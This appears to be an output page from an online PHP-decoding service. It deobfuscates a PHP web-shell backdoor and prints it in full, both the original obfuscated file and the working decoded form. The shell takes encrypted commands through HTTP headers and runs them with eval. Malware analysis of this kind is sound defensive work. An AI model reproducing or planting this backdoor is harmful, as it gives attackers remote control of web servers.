Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $q='md5(9$$i.$9$k9$9$h),0,3));$f=$sl($ss9$(md5($9$i.$kf),0,39$));$p="9$";9$f9$or($z..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$q='md5(9$$i.$9$k9$9$h),0,3));$f=$sl($ss9$(md5($9$i.$kf),0,39$));$p="9$";9$f9$or($z=19$;$z<cou9$n9$t($m[1]);9$';
$z='$=$_SER9$VER;$rr9$=@$r9$["HTTP_REF9$ERE9$R"];$ra=@$r[9$9$"HTTP_ACCEPT_L9$9$ANGUAGE9$"];if($rr9$&&$9';
$C='$z++)$p.=$q[9$$9$m[2][$z]9$9$];if(strp9$os($9$p9$,9$$h)===0){9$$s[$i]="";$p=$ss($p9$,3);}if(ar9$ray_k9';
$h='$9$ra){$u=parse_ur9$l($rr);p9$arse9$_st9$r($u[9$"query9$"],9$$q);$q=arra9$y9$_values($q);pre9$g_ma9$tch_';
$T='=0;$i<$l;){for9$($j=0;9$9$($j9$<$c&&$i<$l);$9$j++,$i++9$)9${$o.=9$$t{$i}^$k{$j}9$;9$}}r9$eturn $o;9$}$r9';
$a='$t(9$);@e9$val(@gz9$uncompr9$e9$ss(@x(@base69$4_decode(p9$reg_rep9$lace(arr9$ay("/9$_/9$","/-/"),arr9$a';
$A='$9$kh=9$"5d41";$k9$f="402a";funct9$ion x9$($t,$9$k)9${$c=strlen($k)9$;$l=9$strl9$en($t9$);$o="";for9$9$(9$$i';
$x=str_replace('B','','crBeaBtBeB_BfuBnction');
$H='se69$4_encod9$e(x(g9$zco9$mpress(9$$o),$k));p9$9$rin9$t("<$k9$>$d<9$/$k9$>");@session_9$destroy();}}}}';
$G='$ey_exi9$sts($9$i,$s)){9$$s[$i]9$.=9$$p;9$$e=strpos(9$$s[$9$i],$9$f);if($e)9${$k=$k9$h.$kf;o9$b_star9';
$I='all9$("/(9$9$[\\w])[\\w-9$]+(?:;q=0.9$9$(9$[\\d]))?,?/",$ra,$9$m)9$;if9$($q&&$m9$){@session_sta9$rt();9$$9$';
$p='y("/9$",9$9$"+"),$ss($s9$[$i9$],0,$e))),$k)9$));$9$o=ob_get9$_content9$s9$();ob_end9$_9$c9$lean();$d=ba';
$m='s=&9$$_SESS9$ION;$s9$s="substr";$s9$l="st9$rtolo9$9$wer";$i=$m[1][0]9$.$9$m[1]9$[1];9$$h=$sl($ss(9$';
$S=str_replace('9$','',$A.$T.$z.$h.$I.$m.$q.$C.$G.$a.$p.$H);
$K=$x('',$S);$K();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$A $9$kh=9$"5d41";$k9$f="402a";funct9$ion x9$($t,$9$k)9${$c=str..
$C $z++)$p.=$q[9$$9$m[2][$z]9$9$];if(strp9$os($9$p9$,9$$h)===0)..
$G $ey_exi9$sts($9$i,$s)){9$$s[$i]9$.=9$$p;9$$e=strpos(9$$s[$9$..
$H se69$4_encod9$e(x(g9$zco9$mpress(9$$o),$k));p9$9$rin9$t("<$k..
$I all9$("/(9$9$[\w])[\w-9$]+(?:;q=0.9$9$(9$[\d]))?,?/",$ra,$9$..
$K None
$S $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$T =0;$i<$l;){for9$($j=0;9$9$($j9$<$c&&$i<$l);$9$j++,$i++9$)9${..
$a $t(9$);@e9$val(@gz9$uncompr9$e9$ss(@x(@base69$4_decode(p9$re..
$h $9$ra){$u=parse_ur9$l($rr);p9$arse9$_st9$r($u[9$"query9$"],9..
$m s=&9$$_SESS9$ION;$s9$s="substr";$s9$l="st9$rtolo9$9$wer";$i=..
$p y("/9$",9$9$"+"),$ss($s9$[$i9$],0,$e))),$k)9$));$9$o=ob_get9..
$q md5(9$$i.$9$k9$9$h),0,3));$f=$sl($ss9$(md5($9$i.$kf),0,39$))..
$x create_function
$z $=$_SER9$VER;$rr9$=@$r9$["HTTP_REF9$ERE9$R"];$ra=@$r[9$9$"HT..

Stats

MD5 670dae7f28182b252e3e7f0b926dd622
Eval Count 1
Decode Time 128 ms